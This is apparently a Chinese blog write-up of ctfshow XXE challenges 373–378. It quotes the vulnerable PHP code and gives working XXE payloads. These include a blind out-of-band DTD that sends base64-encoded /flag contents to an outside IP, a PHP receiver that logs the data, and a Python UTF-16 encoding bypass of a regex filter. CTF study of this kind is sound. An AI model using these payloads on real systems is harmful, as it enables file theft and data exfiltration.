ctfshow--xxe 373--378

最新推荐文章于 2024-08-08 19:40:34 发布
最新推荐文章于 2024-08-08 19:40:34 发布
阅读量887 收藏 29
点赞数 25
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80548709/article/details/137123962
版权

373.

首先我们需要先了解xxe漏洞存在在哪儿

这里有一位师傅的对于XXE的理解

XXE漏洞详解

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);

这里使用了libxml_disable_entity_loader()这个函数是用来看是否使用外部实体解析,如果里面的参数是false则是开启外部实体解析,后面的 $xmlfile是通过输入流中直接获取,所以这里我们抓包写入程序即可,

然后看后面的代码,

DOMDocument类,这是php中一个关于xml的一个类,这个类通常是用于创建一个新的xml文档,

然后下一步,他将生成的xml数据,又拷给了simplexml类,这个类的特点是易于操作xml的数据,

我们可以看见最后一步,$creds访问了ctfshow元素,说明我们构造的xml文档需要将我们想得到的外部实体的资源放在ctfshow的元素中的,构造ctfshow元素即可,这里补充一点就是一般简单的xml文档不需要再在dtd中声明文档中所含的元素

看完代码过后,就明白了payload应该咋写了

因为有回显,所以我们构造

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///flag"> ]>
<foo>
    <ctfshow>&xxe;</ctfshow>
</foo>

374. 

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

可以看见,其实其它的都是一样的,但是吧,没那个echo了,也就是说数据在存入DOMDocument类后就没了,也就是没有了回显了,这里给出做法

1.一个dtd文件在本地服务器上

# xxe.xml
<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://8.130.127.44/x.php?1=%file;'"
>
%all;

本地服务器上构造php文件用于接收数据 

# x.php
<?php
$content = $_GET['1'];
if(isset($content)){
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    echo 'no data input';
}

3.burp抓包传入 


<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % remote SYSTEM "http://xxx/xxe.xml">
%remote;
%send;
]>

让我来解释一下做法,由于我们在它的服务器上看不见回显,所以就只能将得到的数据通过外部实体system方式,传到我们的服务器上,去看flag

首先我们知道,我们这里实际上是可以汇总在一起的,但是为了清晰明了,我把两段dtd分开,

第一句,也是很重要的一句,我们需要获得当前目录下的flag数据,然后在本地服务器创建的dtd文件作用是创建与我们的服务器的联系,最后一个%send,将实体解析,于是在题目的服务器下,将/flag文件里的数据通过实体%file通过get传参传入了我们的php文件中,并执行,于是触发命令,将flag写入了flag.txt中,注意上图的http://xxx代表自己本地服务器的ip地址

375. 

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 15:22:05
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

相较于上一题,这一题过滤了版本号,我们不写就没问题,况且我上一题就没写....

所以同上!

376.

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);  
?>

这里也是禁用版本号,所以同上,

377.

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 15:26:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

,这个在禁用版本号的基础上,还禁用了http头,这里我们需要知道一些新的知识,就是关于xml解释器可以翻译的编码形式


XML解析器通常可以解析多种编码形式的XML文档,其中一些常见的编码包括:

UTF-8:这是最常见的编码形式,也是许多XML文档默认使用的编码。
UTF-16:XML文档也可以使用UTF-16编码。
ISO-8859-1(Latin-1):虽然不常见,但XML解析器通常也能够解析使用ISO-8859-1编码的XML文档。
其他:除了上述常见的编码形式之外,XML解析器还可能支持其他一些编码形式,如UTF-32等。
通常情况下,XML解析器能够根据XML文档中的声明或者特征来确定文档所使用的编码形式,从而正确解析文档内容。
正则表达式通常是针对ASCII字符编写的,而不是针对Unicode字符编写的。

UTF-16编码使得每个字符占用两个字节,这可能会使得某些正则表达式检测不到字符串中的特定模式,因为正则表达式可能只检查单个字节或特定的字节序列。

由此可以明白,当我们更改编码方式过后,我们就可以绕过简单的正则表达式,

更改默认的编码方式,我们用bp好像不行,所以跟着网上的做法,通过构造post传参

import requests

url = 'http://8b8a3d03-40d2-4131-a046-710f0cd40dbd.challenge.ctf.show/'
data = """<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/test.dtd">
%dtd;
%send;
] >"""

requests.post(url ,data=data.encode('utf-16'))
print("done!")

378. 

 

可以看见,有回显

有回显我们需要看是什么类型的回显,比如sql注入,也有来自数据库的回显啥的,

可以抓个包看回显

可以看见这里回显了username,所以抓包往里面注入即可

payload

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&file;</username>
<password>123</password>
</user>

 

瓜农ynnddddd
关注
  • 25
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
libxml2-2.9.13
07-14
9. **安全性**:libxml2关注安全问题,例如防止XXE(XML外部实体注入)和XEE(XML实体扩展)攻击,通过配置选项可以禁用不安全的功能。 10. **API设计**:libxml2提供了清晰的C语言API,易于理解和使用。此外,它还...
fastjson-1.2.5.rar
01-24
Fastjson 1.2.5版在安全方面也有所增强,例如,针对XXE(XML External Entity)攻击,Fastjson增加了防止恶意XML实体注入的措施,提升了应用的安全性。 总结,Fastjson 1.2.5版本是一个稳定且功能强大的JSON库,其...
自学黑客,一般人我劝你还是算了吧!
m0_74942241的博客
02-17 182
写在开篇 笔者本人 17 年就读于一所普通的本科学校,20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂,现就职于某大厂安全联合实验室。 我为啥说自学黑客,一般人我还是劝你算了吧!因为我就是那个不一般的人。
XXE-ctfshow373-378,设计思想与代码质量优化+程序性能优化+开发效率优化
2401_84185182的博客
04-10 325
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
XXE漏洞学习——基础学习(ctfshow—web373
m0_73756016的博客
06-03 841
XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害在某些情况下,攻击者可以利用 XXE 漏洞联合执行服务器端请求伪造(SSRF) 攻击,从而提高 XXE 攻击等级以破坏底层服务器或其他后端基础设施。
ctfshow-XXE(web373-web378)
m0_72125469的博客
03-11 1156
ctfshow web373 web374 web375 web376 web377 web378
Ctfshow web入门 XXE 模板注入篇 web373-web378 详细题解 全
Jay17的博客
08-07 2204
Ctfshow web入门 XXE 模板注入篇 web373-web378 详细题解 全
XXE-ctfshow373-378,2024年最新高级网络安全面试题及答案
04-15 424
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。将1.dtd里ip设为nc的地址和端口就可以了。研究,那么很难做到真正的技术提升。
第四周任务
stronelu的博客
03-30 390
首先来到题目界面,我们看到的是源码:随后我们进行抓包,将代码输入之后,我们就可以得到。
ctfshow-XXE(web373-web378)_ctfshow373
2401_84970250的博客
05-16 287
能编码简单理解就是(我的理解)input获取到数据后 先绕过正则 然后在操作xml的时候这个对象就能识别出是xml 因为xml支持utf-16 这时哪怕在xml声明编码方式为utf-8这也无所谓 这声明的只是xml内容为utf-8 但是整体过来是utf-16 这个对象是能识别出来的 然后看到这个声明为utf-8后再将内容设为utf-8的编码方式。使用一个不同的方式吧(原理都是一个意思) 为什么要绕一圈呢,就是因为在请求的时候 默认不允许将本地文件发送到dtd文件 间接的影响了我们的请求 所以要套一层。
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 ...XXE 科学技术研究院
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
2024年网络安全最全XXE-ctfshow373-378
2301_82242964的博客
05-01 494
【代码】2024年网络安全最全XXE-ctfshow373-378
DTD(文档类型定义)介绍
qq_40321119的博客
10-18 2408
DTD简介 DTD中文意思是:文档类型定义,主要用来定义合法的文档结构(包括XML和HTML);可以声明在文档中,也可以作为外部的引用。 内部DTD声明 <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> ...
ctfshow XXE web373-web378 wp
mumuzi的博客
02-11 1651
文章目录web373web374-376web377web378 web373 XXE(XML External Entity Injection) 全称为 XML 外部实体注入。注入的是XML外部实体 参考文章:一篇文章带你深入理解漏洞之 XXE 漏洞 libxml_disable_entity_loader(false);:禁止加载外部实体。一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 ( ; ) flag在flag里 <?xml version="1.0"
android compose 设置 padding 和 margin
最新发布
阿饱同学
08-08 246
在 Jetpack Compose 中,是一个非常灵活的布局工具。要在中设置padding和margin,需要分别使用padding修饰符和中的margin参数。
[论文翻译] LTAChecker:利用注意力时态网络基于 Dalvik 操作码序列的轻量级安卓恶意软件检测
my991201的博客
08-08 773
Android 应用程序已成为黑客攻击的主要目标。安卓恶意软件检测是一项关键技术,对保障网络安全和阻止异常情况至关重要。然而,传统的静态分析难以分析新的恶意应用程序,而动态分析则需要更多的系统资源。我们提出了一种基于注意力时态网络的新型轻量级安卓恶意软件深度学习检测框架。本研究深入研究了安卓恶意软件的 Dalvik 操作码序列,采用 N-gram 算法分割序列并提取上下文信息特征。然后,利用 LSTM 和 TCN 算法捕捉长期依赖关系和局部特征,从而全面理解 Dalvik 操作码序列中的时间信息。
【vulnhub】Wakanda :1靶机
wbplife的博客
08-07 611
lang=fr表示语言为法语,可以设置成中文,英语等语言,既然这个lang可以改变语言,那么说明改变语言使用了语言php文件,那么关联的就是文件包含漏洞了,页面没什么可以下手的地方,那我们就构造url,这里就关联到一个知识点,也是我们要用到的:php://filter.它是php中一个独有的协议,它作为一个中间流来处理其流,比如我们可以将我们手上的源码用base64解码来dowm下来.创建一个恶意setup.py并上传到tmp目录,和上面的方法一样,创建文件,并远程下载到/tmp目录下面。
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值